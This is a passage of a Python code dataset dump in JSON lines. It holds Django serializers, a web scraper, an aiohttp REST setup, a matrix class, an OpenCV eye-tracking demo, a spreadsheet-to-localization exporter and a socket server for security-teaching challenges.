'city'])\n return super(BookingPartQuoteSerializer, self).to_representation(obj)\n\n def create(self, validated_data):\n notes = validated_data.pop('notes', [])\n instance = super(BookingPartQuoteSerializer, self).create(validated_data)\n for note in notes:\n #note['updated_by'] = validated_data.get('updated_by')\n note_obj = PartQuoteNote.objects.create(**note)\n instance.notes.add(note_obj)\n return instance\n\n def update(self, instance, validated_data):\n notes = validated_data.pop('notes', [])\n instance = super(BookingPartQuoteSerializer, self).update(instance, validated_data)\n for note in notes:\n #note['updated_by'] = validated_data.get('updated_by')\n note_obj = PartQuoteNote.objects.create(**note)\n instance.notes.add(note_obj)\n if instance.selected:\n booking_part = instance.booking_part_doc.booking_part\n booking_part.part_price = instance.price\n booking_part.save()\n return instance\n\n\nclass PartDocNoteSerializer(DynamicFieldsModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n class Meta:\n model = PartDocNote\n fields = '__all__'\n\n def to_representation(self, obj):\n self.fields['updated_by'] = UserSerializer(\n read_only=True,\n new_fields=['id', 'name', 'phone', 'ops_phone'])\n return super(PartDocNoteSerializer, self).to_representation(obj)\n\n\nclass BookingPartDocSerializer(DynamicFieldsModelSerializer):\n notes = PartDocNoteSerializer(many=True, required=False)\n booking_part_quote = BookingPartQuoteSerializer(many=True, read_only=True)\n\n class Meta:\n model = BookingPartDoc\n fields = '__all__'\n\n def to_representation(self, obj):\n if self.fields.get('status'):\n status_serializer_class = GenericModelSerializer\n status_serializer_class.Meta.model = PartDocStatus\n self.fields['status'] = status_serializer_class(new_fields=['id', 'name'])\n self.fields['booking_part'] = BookingPackagePanelSerializer(\n read_only=True,\n new_fields=['id', 'panel_details'],\n change_serializer={\n 'panel_details': CarPanelPriceSerializer(\n source='panel',\n new_fields=['car_panel'],\n change_serializer={\n 'car_panel': CarPanelSerializer(\n new_fields=['name'])\n })\n })\n return super(BookingPartDocSerializer, self).to_representation(obj)\n\n def create(self, validated_data):\n notes = validated_data.pop('notes', [])\n instance = super(BookingPartDocSerializer, self).create(validated_data)\n for note in notes:\n # note['updated_by'] = validated_data.get('updated_by')\n note_obj = PartDocNote.objects.create(**note)\n instance.notes.add(note_obj)\n return instance\n\n def update(self, instance, validated_data):\n notes = validated_data.pop('notes', [])\n instance = super(BookingPartDocSerializer, self).update(instance, validated_data)\n for note in notes:\n # note['updated_by'] = validated_data.get('updated_by')\n note_obj = PartDocNote.objects.create(**note)\n instance.notes.add(note_obj)\n return instance\n\n\nclass BPPHistorySerializer(DynamicFieldsModelSerializer):\n # Booking package panel history serializer\n panel = CarPanelPriceSerializer(new_fields=['car_panel', 'type_of_work'],\n change_serializer={\n 'car_panel': CarPanelSerializer(\n new_fields=['name'])\n })\n\n class Meta:\n model = BookingPackagePanel.history.model\n fields = ('id', 'history_id', 'updated_at', 'created_at', 'booking_package', 'history_type',\n 'panel', 'part_price', 'material_price', 'labour_price')\n\n\nclass BookingExpectedEODSerializer(DynamicFieldsModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n ops_status_details = BookingOpsStatusSerializer(source='ops_status',read_only=True)\n updated_by_details = UserSerializer(source='updated_by',\n read_only=True,\n new_fields=['id', 'name', 'email', 'phone', 'ops_phone'])\n\n class Meta:\n model = BookingExpectedEOD\n fields = ('__all__')\n","sub_path":"bumper2/api/serializers/bookingSerializers.py","file_name":"bookingSerializers.py","file_ext":"py","file_size_in_byte":68254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549080882","text":"\"\"\"\nPython program that webscrapes dynamically: collects randomized dice-roll & timestamp, then reloads page and collects again.\n $ python3 realtime_scraper.py\n\"\"\"\nimport mechanicalsoup\nimport time # time.sleep(sec)\n\n\n\nbrowser = mechanicalsoup.Browser() # create headless web browser instance\nrolls = dict() #store dice-roll/timestamp\nfor i in range(4): # x4 dice rolls total\n page = browser.get(\"http://olympus.realpython.org/dice\") # open the webpage\n roll_tag = page.soup.select(\"#result\")[0] # find element with id=result (BeautifulSoup object's .select() method).\n result = roll_tag.text\n timestamp_tag = page.soup.select(\"#time\")[0] # find element with id=time\n timestamp = timestamp_tag.text # get timestamp text only\n print(f\"The result of the {timestamp} dice roll is {result}.\")\n rolls[timestamp] = result # add: dict[key] = value\n if i < 3: time.sleep(2) # pause 2 sec after each roll (not after last roll!)\n\nprint(rolls) # print the dictionary\n","sub_path":"WebScrape/realtime_scraper.py","file_name":"realtime_scraper.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"137667671","text":"\"\"\" Restful API\n\n - Loads and validates openapi specifications (oas)\n - Adds check and diagnostic routes\n - Activates middlewares\n\n\"\"\"\nimport asyncio\nimport logging\n#from copy import deepcopy\n\nfrom aiohttp import web\nfrom tenacity import before_sleep_log, retry, stop_after_attempt, wait_fixed\n\nfrom servicelib import openapi\nfrom servicelib.application_keys import APP_CONFIG_KEY\nfrom servicelib.openapi import create_openapi_specs\nfrom servicelib.rest_middlewares import append_rest_middlewares\n\nfrom . import rest_routes\nfrom .rest_config import APP_OPENAPI_SPECS_KEY, CONFIG_SECTION_NAME\n\nlog = logging.getLogger(__name__)\n\n\nRETRY_WAIT_SECS = 2\nRETRY_COUNT = 20\nCONNECT_TIMEOUT_SECS = 30\n\n\ndef get_server(servers, url):\n # Development server: http://{host}:{port}/{basePath}\n for server in servers:\n if server.url == url:\n return server\n raise ValueError(\"Cannot find server %s in openapi specs\" % url)\n\n\n@retry( wait=wait_fixed(RETRY_WAIT_SECS),\n stop=stop_after_attempt(RETRY_COUNT),\n before_sleep=before_sleep_log(log, logging.INFO) )\nasync def get_specs(location):\n specs = await create_openapi_specs(location)\n return specs\n\n\ndef setup(app: web.Application, *, debug=False):\n log.debug(\"Setting up %s %s...\", __name__, \"[DEBUG]\" if debug else \"\")\n\n # main_cfg = app[APP_CONFIG_KEY][\"main\"]\n cfg = app[APP_CONFIG_KEY][CONFIG_SECTION_NAME]\n\n try:\n #specs = await create_openapi_specs(location=cfg[\"location\"])\n loop = asyncio.get_event_loop()\n location = cfg[\"location\"]\n specs = loop.run_until_complete( get_specs(location) )\n\n # TODO: tmp removed but keep in case ...\n # sets servers variables to current server's config\n # extra_api_urls = cfg.get(\"extra_urls\", list())\n # if debug:\n # for host in {'127.0.0.1', 'localhost', main_cfg['host'] }:\n # for port in {9081, main_cfg['port']}:\n # extra_api_urls.append(\"http://{}:{}\".format(host, port))\n\n # server = get_server(specs.servers, \"{publicUrl}/{basePath}\")\n # for url in extra_api_urls:\n # new_server = deepcopy(server)\n # new_server.variables['publicUrl'].default = url\n # specs.servers.append(new_server)\n\n\n # TODO: What if many specs to expose? v0, v1, v2 ... perhaps a dict instead?\n # TODO: should freeze specs here??\n app[APP_OPENAPI_SPECS_KEY] = specs # validated openapi specs\n\n\n # diagnostics routes\n routes = rest_routes.create(specs)\n app.router.add_routes(routes)\n\n # middlewares\n base_path = openapi.get_base_path(specs)\n version = cfg[\"version\"]\n assert \"/\"+version == base_path, \"Expected %s, got %s\" %(version, base_path)\n append_rest_middlewares(app, base_path)\n\n except openapi.OpenAPIError:\n # TODO: protocol when some parts are unavailable because of failure\n # Define whether it is critical or this server can still\n # continue working offering partial services\n log.exception(\"Invalid rest API specs. Rest API is DISABLED\")\n\n# alias\nsetup_rest = setup\n\n__all__ = (\n 'setup_rest'\n)\n","sub_path":"services/web/server/src/simcore_service_webserver/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"271169461","text":"class Matrix:\n def __init__(self, matrix):\n self.matrix = matrix\n\n def __str__(self):\n return '\\n'.join([''.join(['{:3}'.format(column) for column in row]) for row in self.matrix])\n\n def __add__(self, other):\n return Matrix([[self.matrix[row][column] + other.matrix[row][column] for column in range(len(self.matrix[row]))]\n for row in range(len(self.matrix))])\n\n\ndef sum_res(*args):\n plus = [[\"\", \"+\"] if r == 1 else [\"\", \"\"] for r in range(len(args[0]))]\n equal = [[\"\", \"=\"] if r == 1 else [\"\", \"\"] for r in range(len(args[0]))]\n to_return = []\n rows = []\n\n for row in range(len(args[0])):\n for arg in range(len(args)):\n rows.extend(args[arg][row])\n if arg < len(args) - 2:\n rows.extend(plus[row])\n elif arg == len(args) - 2:\n rows.extend(equal[row])\n to_return.append(rows.copy())\n rows.clear()\n\n return to_return\n\n\n# Example 1: 3x2 matrices\nmatrix1 = Matrix([[2, 3], [4, 1], [7, 9]])\nmatrix2 = Matrix([[9, 1], [11, 2], [13, 8]])\nprint(f'Sum of 3x2 matrices: \\n{Matrix(sum_res(matrix1.matrix, matrix2.matrix, (matrix1 + matrix2).matrix))}',\n end=\"\\n\\n\")\n\n# Example 1: 3x3 matrices\nmatrix1 = Matrix([[1, 2, 3], [3, 4, 1], [6, 7, 9]])\nmatrix2 = Matrix([[8, 9, 1], [10, 11, 2], [12, 13, 8]])\nprint(f'Sum of 3x3 matrices: \\n{Matrix(sum_res(matrix1.matrix, matrix2.matrix, (matrix1 + matrix2).matrix))}',\n end=\"\\n\\n\")\n\n# Example 1: 2x4 matrices\nmatrix1 = Matrix([[1, 2, 3, 6], [3, 4, 1, 9]])\nmatrix2 = Matrix([[8, 9, 1, 12], [10, 11, 2, 8]])\nprint(f'Sum of 2x4 matrices: \\n{Matrix(sum_res(matrix1.matrix, matrix2.matrix, (matrix1 + matrix2).matrix))}',\n end=\"\\n\\n\")\n","sub_path":"Lesson7/Lesson7_Ex_1.py","file_name":"Lesson7_Ex_1.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"433160633","text":"import cv2\r\nimport time\r\n\r\nscale = 2\r\ncap = cv2.VideoCapture(0)\r\n\r\nlist_eye_locaton = []\r\nhistory_eye_locations = []\r\nisDraw = True\r\n\r\nblack = cv2.imread('./black.png')\r\nadv = cv2.imread('./adv.jpg')\r\n\r\nTIMER = int(15)\r\n# SET THE COUNTDOWN TIMER\r\n# for simplicity we set it to 3\r\n# We can also take this as input\r\n\r\n# Open the camera\r\ndef eye_tracking(ret, frame):\r\n\r\n height, width, channels = frame.shape\r\n\r\n centerX, centerY = int(height / 2), int(width / 2)\r\n radiusX, radiusY = int(scale * height / 100), int(scale * width / 100)\r\n\r\n minX, maxX = centerX - radiusX, centerX + radiusX\r\n minY, maxY = centerY - radiusY, centerY + radiusY\r\n\r\n cropped = frame[minX:maxX, minY:maxY]\r\n resized_cropped = cv2.resize(cropped, (width, height))\r\n\r\n roi = resized_cropped\r\n roi = cv2.flip(roi, 1)\r\n rows, cols, _ = roi.shape\r\n gray_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\r\n gray_roi = cv2.GaussianBlur(gray_roi, (7, 7), 0)\r\n\r\n _, threshold = cv2.threshold(gray_roi, 28, 255, cv2.THRESH_BINARY_INV)\r\n contours, _ = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n contours = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)\r\n\r\n temp = cv2.addWeighted(roi, 0, black, 100, 0)\r\n advImg = cv2.add(temp, adv)\r\n\r\n for cnt in contours:\r\n (x, y, w, h) = cv2.boundingRect(cnt)\r\n cenX = int((x + (x + w)) / 2)\r\n cenY = int((y + (y + h)) / 2)\r\n cv2.circle(advImg, (cenX, cenY), 10, (0, 255, 0), -1)\r\n\r\n break\r\n\r\n return threshold, gray_roi, advImg\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n\r\n # Read and display each frame\r\n ret, frame = cap.read()\r\n\r\n # 함수 호출\r\n threshold, gray_roi, advImg =eye_tracking(ret, frame)\r\n\r\n cv2.imshow(\"Bin\", threshold)\r\n cv2.imshow(\"Gray ROI\", gray_roi)\r\n cv2.imshow(\"Eye tracking\", advImg)\r\n\r\n # check for the key pressed\r\n k = cv2.waitKey(125)\r\n\r\n # set the key for the countdown\r\n # to begin. Here we set q\r\n # if key pressed is q\r\n if k == ord('q'):\r\n prev = time.time()\r\n\r\n while TIMER > 0:\r\n ret, frame = cap.read()\r\n\r\n # 함수 호출\r\n threshold, gray_roi, advImg = eye_tracking(ret, frame)\r\n\r\n # Display countdown on each frame\r\n # specify the font and draw the\r\n # countdown using puttext\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n cv2.putText(advImg, str(TIMER), (550, 50), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 0), 3)\r\n cv2.imshow(\"Bin\", threshold)\r\n cv2.imshow(\"Gray ROI\", gray_roi)\r\n cv2.imshow(\"Eye tracking\", advImg)\r\n cv2.waitKey(125)\r\n\r\n # current time\r\n cur = time.time()\r\n\r\n # Update and keep track of Countdown\r\n # if time elapsed is one second\r\n # than decrese the counter\r\n if cur - prev >= 1:\r\n prev = cur\r\n TIMER = TIMER - 1\r\n\r\n # else:\r\n # ret, frame = cap.read()\r\n #\r\n # # Display the clicked frame for 2\r\n # # sec.You can increase time in\r\n # # waitKey also\r\n # cv2.imshow(\"Bin\", threshold)\r\n # cv2.imshow(\"Gray ROI\", gray_roi)\r\n # cv2.imshow(\"Eye tracking\", whiteImg)\r\n #\r\n # # time for which image displayed\r\n # cv2.waitKey(2000)\r\n #\r\n # # Save the frame\r\n # #cv2.imwrite('camera.jpg', img)\r\n #\r\n # # HERE we can reset the Countdown timer\r\n # # if we want more Capture without closing\r\n # # the camera\r\n\r\n # Press Esc to exit\r\n elif k == 27:\r\n break\r\n\r\n# close the camera\r\ncap.release()\r\n\r\n# close all the opened windows\r\ncv2.destroyAllWindows()","sub_path":"Gaze detection/adv_Countdown.py","file_name":"adv_Countdown.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"633808853","text":"#!/usr/bin/python\n\n# Copyright (c) 2019 Roman Gille, http://romangille.com\n\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\n# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport urllib.request\nimport json\nimport os\nimport re\nimport xml.etree.ElementTree as xml\nfrom xml.dom import minidom\n\nplaceholderPattern = re.compile(r'{String([0-9]*)}|{Number([0-9]*)}')\nscriptRunPath = os.getcwd()\nscriptFileName = os.path.basename(__file__)\nconfigFileName = os.path.splitext(scriptFileName)[0] + \".config.json\"\n\nl10nCommentIdentifier = \"//\"\nl10nSectionTitleIdentifier = \"// -\"\nl10nLineFormat = \"\\\"%s\\\" = \\\"%s\\\";\\n\"\n\ndef parseDocument(spreadsheedId, sheetIndex):\n sheetUrl = \"https://spreadsheets.google.com/feeds/cells/\"+ spreadsheedId +\"/\"+ str(sheetIndex) +\"/public/full?alt=json\"\n \n print(\"Loading JSON from %s.\" % sheetUrl)\n\n with urllib.request.urlopen(sheetUrl) as response:\n content = response.read()\n parsed_json = json.loads(content)\n\n entries = parsed_json['feed']['entry']\n rows = {}\n\n for entry in entries:\n cellInfo = entry['gs$cell']\n row = int(cellInfo['row'])\n rows[row] = {}\n\n print(\"Found %i rows.\" % (len(rows) - 1))\n # print(json.dumps(rows, indent=4, sort_keys=True))\n\n for entry in entries:\n cellInfo = entry['gs$cell']\n row = int(cellInfo['row'])\n col = int(cellInfo['col'])\n cellContent = entry['content']['$t']\n rows[row][col] = cellContent\n\n return rows\n\ndef writeLocalizations(rows, configuration):\n languageCount = max(rows[1].keys()) - 1\n print(\"Found %i languages.\" % languageCount)\n\n for languageColumn in range(2, 2 + languageCount):\n languageKey = rows[1][languageColumn].replace(\" \", \"\")\n \n if configuration[\"os\"] == \"iOS\":\n buildLocalizationIOS(rows, languageColumn, languageKey, configuration)\n \n if configuration[\"os\"] == \"Android\":\n buildLocalizationAndroid(rows, languageColumn, languageKey, configuration)\n\ndef buildLocalizationIOS(rows, column, languageKey, configuration):\n\n # Prepare paths.\n baseLanguage = \"en\" if (configuration[\"baseLanguage\"] is None) else configuration[\"baseLanguage\"]\n languageFolderName = \"Base\" if (languageKey == baseLanguage) else languageKey\n folderPath = configuration[\"outputFolder\"] + \"/\" + languageFolderName + \".lproj\"\n fileName = configuration[\"fileName\"] + \".strings\"\n filePath = folderPath + \"/\" + fileName\n\n # Prepare file.\n outputFile = startFile(folderPath, filePath, fileName)\n l10nWriteHeaderComment(fileName, outputFile)\n\n for row in rows:\n # Skip first row and rows without first column.\n if row == 1 or 1 not in rows[row]:\n continue\n\n key = rows[row][1]\n # Add section comment.\n if key.startswith(l10nSectionTitleIdentifier):\n l10nWriteSectionComment(key, outputFile)\n continue\n\n # Skip empty translations...\n if column not in rows[row]:\n # ...but check if the key is a commetn first.\n if key.startswith(l10nCommentIdentifier):\n l10nWriteComment(key, outputFile)\n continue\n\n translation = placeholderPattern.sub(\"%@\", rows[row][column])\n line = \"\\\"%s\\\" = \\\"%s\\\";\" % (key, translation)\n # Check if the line is commented.\n if key.startswith(l10nCommentIdentifier):\n l10nWriteComment(line, outputFile)\n continue\n\n # Write line.\n outputFile.write(\"%s\\n\" % line)\n\n outputFile.close()\n print(\"Generated \" + filePath + \".\")\n\ndef buildLocalizationAndroid(rows, column, languageKey, configuration):\n\n # Prepare paths.\n isBaseLanguage = (configuration[\"baseLanguage\"] == languageKey)\n languageFolderName = \"values\" if isBaseLanguage else \"values-\" + languageKey\n folderPath = configuration[\"outputFolder\"] + \"/\" + languageFolderName\n fileName = configuration[\"fileName\"] + \".xml\"\n filePath = folderPath + \"/\" + fileName\n\n strings = []\n\n for row in rows:\n # Skip first row and rows without first column.\n if row == 1 or 1 not in rows[row]:\n continue\n\n key = rows[row][1]\n if key.startswith(l10nSectionTitleIdentifier):\n strings.append({key: \"\"})\n continue\n # Skip comments.\n if key.startswith(l10nCommentIdentifier):\n continue\n strings.append({key: placeholderPattern.sub(\"%s\", rows[row][column])})\n\n outputFile = startFile(folderPath, filePath, fileName)\n outputFile.write(buildResourceXML(strings, \"string\"))\n outputFile.close()\n print(\"Generated \" + filePath + \".\")\n\ndef writeColors(rows, configuration):\n\n isAndroid = (configuration[\"os\"] == \"Android\")\n fileExtension = \".xml\" if isAndroid else \".json\"\n folderPath = configuration[\"outputFolder\"]\n fileName = configuration[\"fileName\"] + fileExtension\n filePath = folderPath + \"/\" + fileName\n\n colors = []\n\n for row in rows:\n # Skip first row and rows without first column.\n if row == 1 or 1 not in rows[row]:\n continue\n\n key = rows[row][1]\n hexValue = rows[row][2]\n colors.append({key: hexValue})\n\n outputFile = startFile(folderPath, filePath, fileName)\n\n if isAndroid:\n outputFile.write(buildResourceXML(colors, \"color\"))\n else:\n jsonDict = {}\n for item in colors:\n key = next(iter(item))\n jsonDict[key] = item[key]\n json.dump(jsonDict, outputFile)\n \n\n outputFile.close()\n print(\"Generated \" + filePath + \".\")\n\ndef buildResourceXML(keyValueArray, elementName):\n root = xml.Element(\"resources\")\n root.insert(0, xml.Comment(\"Generated with \" + scriptFileName))\n itemCount = 0\n\n for item in keyValueArray:\n key = next(iter(item))\n if key.startswith(l10nSectionTitleIdentifier):\n # Add comment.\n root.insert(itemCount, xml.Comment(xmlWriteSectionComment(key)))\n continue\n # Add line.\n xml.SubElement(root, elementName, name=key).text = item[key]\n itemCount += 1\n\n xmlString = xml.tostring(root)\n return minidom.parseString(xmlString).toprettyxml()\n\ndef startFile(folderPath, filePath, fileName, binary=False):\n\n os.makedirs(folderPath, exist_ok=True)\n fileHandler = open(filePath, \"wb\" if (binary) else \"w\")\n return fileHandler\n\n# Comment helper.\n\ndef l10nWriteComment(comment, fileHandler):\n\n fileHandler.write(\"/* %s */\\n\" % comment.replace(l10nCommentIdentifier, \"\"))\n\ndef l10nWriteHeaderComment(fileName, fileHandler):\n\n fileHandler.write(\"/*\\n \" + fileName + \"\\n Generated with \" + scriptFileName + \".\\n*/\\n\\n\")\n\ndef l10nWriteSectionComment(sectionTitle, fileHandler):\n\n fileHandler.write(\"\\n/*\\n Section: %s\\n*/\\n\" % sectionTitle.replace(l10nSectionTitleIdentifier, \"\").replace(\" \", \"\"))\n\ndef xmlWriteSectionComment(sectionTitle):\n\n return \"Section: %s\" % sectionTitle.replace(l10nSectionTitleIdentifier, \"\").replace(\" \", \"\")\n\n# Run.\n\ndef run(config):\n\n sheetId = config[\"sheetId\"]\n\n for l10nConfig in config[\"l10n\"]:\n tableData = parseDocument(sheetId, l10nConfig[\"sheetNumber\"])\n writeLocalizations(tableData, l10nConfig)\n\n for colorConfig in config[\"colors\"]:\n tableData = parseDocument(sheetId, colorConfig[\"sheetNumber\"])\n writeColors(tableData, colorConfig)\n\ndef main():\n # Parse config file and run tasks.\n try:\n with open(configFileName, 'r') as stream:\n config = json.load(stream)\n run(config)\n\n except json.JSONDecodeError as exc:\n print(\"Error parsing config file: \")\n print(exc)\n\n except FileNotFoundError:\n print(\"Error: Could not find \\\"\" + configFileName + \"\\\". This should be placed at the run directory of this script. Current run directory is \\\"\" + scriptRunPath +\"\\\".\")\n\n# This will get called when the file is called via `python fileneme.py`\nif __name__ == '__main__':\n main()\n","sub_path":"Sources/data_sync.py","file_name":"data_sync.py","file_ext":"py","file_size_in_byte":9011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"355436037","text":"\"\"\" Server for RaspberryPi (Python 3.6)\r\n\r\nThis is a server written during the internship with dr. Charles Morisset, Newcastle University.\r\nIts purpose is to teach security in live but safe environment, with the help of Raspberry Pi.\r\n\r\nAuthor: Kacper Florianski\r\n\r\n=== Usage ===\r\n\r\nRun $ python server.py where python refers to version 3.6. From that moment you can connect to the server\r\nby specifying Pi's ethernet IP and port (defaults to 50000).\r\n\r\nOnce ran the server should never stop listening to incoming connections, however it will only accept 1 at a time.\r\n\r\nRaspberry Pi should run the server on startup, if you have access to pi's console you can check if it's running\r\nby typing $ ps aux | grep python and looking for process with server.py in name.\r\n\r\n=== Adding your own challenge ===\r\n\r\nYou can make your own challenge with the help of methods and variables existing in the server. There are some rules:\r\n\r\n - you have to create a separate folder for your challenge, with a unique name\r\n - you have to provide a python's module called 'main' (ex. module main in folder reverse)\r\n - you have to develop a single python function that can be called from the server (the function can call other scripts)\r\n - the function mentioned has to have the same name as the module (ex. function main in module main in folder reverse)\r\n - the function mentioned has to take EXACTLY 2 arguments - server and command data (ex. main(server, data))\r\n - your function should implement the usage of help argument\r\n\r\nIf the following requirements are met, the server will automatically add a command and use provided files.\r\n\r\nIn your challenge you can access:\r\n\r\n - cache variable, it's a python dictionary where you can store information required for your challenge\r\n - send(data) method, which sends a message (string) to the connected client\r\n\r\nWhile it is not possible to restrict the access to other variables or methods, I do not encourage to use them.\r\n\r\nPlease refer to the template files for additional guidance regarding making your own challenge, including good practice.\r\nTemplates can be found in the templates folder.\r\n\r\n=== Example ===\r\n\r\nLet's say a client connects to the pi and enters following commands in given order:\r\n\r\nInput: Hello\r\nOutput: Invalid command. Type !help to display available commands.\r\n\r\nInput: !help\r\nOutput: Here are the available commands:\r\n - !help\r\n - !reverse_programming\r\nTo learn more about each command, type help.\r\nTo add arguments to a command, type (...)\r\n\r\nInput: !reverse_programming help\r\nOutput: !reverse_programming - starts the programming challenge\r\n!reverse_programming - checks the answer of the programming challenge\r\n!reverse_programming no_key - starts the previous challenge, but with an unknown key of length 5\r\n!reverse_programming no_key - checks the answer of the no_key challenge\r\n\r\nNote that \"!reverse_programming help\" command had to be coded within the reverse function, and used the data argument to\r\nachieve desired functionality (precisely, in that case data = [\"!reverse_programming\", \"help\"])\r\n\"\"\"\r\n\r\nfrom os import listdir, path\r\nfrom importlib import import_module\r\nimport socket\r\n\r\n\r\n# TODO: Add docs of each element\r\nclass Server:\r\n\r\n def __init__(self, *, host_ip='0.0.0.0', port=50000):\r\n\r\n # Save the host and port information\r\n self.host_ip = host_ip\r\n self.port = port\r\n\r\n # Initialise the socket for IPv4 addresses (hence AF_INET) and TCP (hence SOCK_STREAM)\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n try:\r\n # Bind the socket to the given address\r\n self.socket.bind((self.host_ip, self.port))\r\n except socket.error as e:\r\n print(\"Failed to bind socket to the given ip and port - \" + str(e))\r\n\r\n # Tell the server to listen to only one connection\r\n self.socket.listen(1)\r\n\r\n # Initialise client information\r\n self.client_socket = None\r\n self.client_address = None\r\n self.client_ip = None\r\n\r\n # Initialise possible commands, add hardcoded help method\r\n self.commands = {\r\n \"!help\": self.help,\r\n }\r\n\r\n # Create an empty dictionary to let the challenge creators store important information\r\n self.cache = {}\r\n\r\n # Build the commands for all properly prepared file structures\r\n self.build()\r\n\r\n def build(self):\r\n\r\n # Get the path to current (root) directory\r\n root = path.normpath(path.dirname(__file__))\r\n\r\n # Retrieve immediate child directories of root directory\r\n directories = [child for child in listdir(root) if path.isdir(path.join(root, child))]\r\n\r\n # Iterate over each sub-folder\r\n for directory in directories:\r\n\r\n try:\r\n # Check if a following command already exists (name clash)\r\n if \"!\" + directory in self.commands:\r\n raise NameError\r\n\r\n # Attempt to add a function from a module that both have the same name as directory\r\n self.commands[\"!\" + directory] = getattr(import_module(directory + \".main\"), \"main\")\r\n\r\n # In case a module couldn't be found\r\n except ModuleNotFoundError:\r\n print(\"Could not find \\\"main\\\" module within the \" + directory + \" folder.\")\r\n\r\n # In case the directory name was resulting in an error, for example it had a dot ('.') character\r\n except TypeError:\r\n print(\"Invalid name for the \" + directory + \" directory.\")\r\n\r\n # In case a function couldn't be found\r\n except AttributeError:\r\n print(\"Could not find \\\"main\\\" function within the \" + directory + \" folder.\")\r\n\r\n # In case the given name already exists\r\n except NameError:\r\n print(\"Function !\" + directory + \" was already added to the server.\")\r\n\r\n def run(self):\r\n\r\n # Never stop the server once it was started\r\n while True:\r\n\r\n # Inform that the server is ready to receive a connection\r\n print(\"Waiting for a connection to {} on port {}...\".format(self.host_ip, self.port))\r\n\r\n # Wait for a connection (accept function blocks the program until a client connects to the server)\r\n self.client_socket, self.client_address = self.socket.accept()\r\n\r\n # Inform that someone has connected\r\n print(\"Client with address {} connected\".format(self.client_address))\r\n\r\n # Store the ip separate to other address details for convenience\r\n self.client_ip = self.client_address[0]\r\n\r\n # Inform the user that he is connected\r\n self.send(\"Connected! Type !help to display available commands.\" + \"\\r\\n\")\r\n\r\n while True:\r\n\r\n try:\r\n # Once connected, keep receiving the data, break in case of errors\r\n data = self.client_socket.recv(2048)\r\n except ConnectionResetError:\r\n break\r\n except ConnectionAbortedError:\r\n break\r\n\r\n # If 0-byte was received, close the connection\r\n if not data:\r\n break\r\n\r\n try:\r\n # Convert bytes to string, remove white spaces\r\n data = data.decode(\"utf-8\").strip()\r\n except UnicodeDecodeError:\r\n # Ignore if an invalid character was sent (ex. Putty's telnet sends hex characters at start)\r\n data = None\r\n\r\n # If data was valid\r\n if data:\r\n\r\n # Inform what data was received\r\n print(\"Received: \" + data)\r\n\r\n # Split the data string if so to retrieve the command and the arguments\r\n data = data.split(\" \")\r\n\r\n # Check if an existing command was requested\r\n if data[0] in self.commands:\r\n\r\n # Execute a valid command\r\n self.commands.get(data[0])(self, data)\r\n\r\n # Inform that a command was executed\r\n print(\"Command \" + data[0] + \" executed\")\r\n\r\n else:\r\n # Inform the user that an invalid command was sent\r\n self.send(\"Invalid command. Type !help to display available commands.\" + \"\\r\\n\")\r\n\r\n # Clean up\r\n self.client_socket.close()\r\n self.cache = {}\r\n\r\n # Inform that the connection is closed\r\n print(\"Connection from {} address closed successfully\".format(self.client_ip))\r\n\r\n def send(self, data):\r\n self.client_socket.sendall(str.encode(data))\r\n\r\n @staticmethod\r\n def help(server, data):\r\n\r\n # Construct the help message's header\r\n message = \"Here are the available commands:\\r\\n\"\r\n\r\n # Construct the content\r\n for command in server.commands.keys():\r\n message = message + \" - \" + command + \"\\r\\n\"\r\n\r\n # Add further help info\r\n message = message + \"To learn more about each command, type help. \" + \"\\r\\n\"\r\n message = message + \"To add arguments to a command, type (...)\" + \"\\r\\n\"\r\n\r\n # Send the prepared message to the client\r\n server.send(message)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n s = Server()\r\n s.run()\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476625064","text":"import os.path\nimport re\nimport sys\nfrom html.parser import HTMLParser as PyHTMLParser\nfrom typing import Union, Optional, List, Callable\nfrom urllib import parse\n\nimport validators\nfrom lxml import etree\nfrom lxml.html import 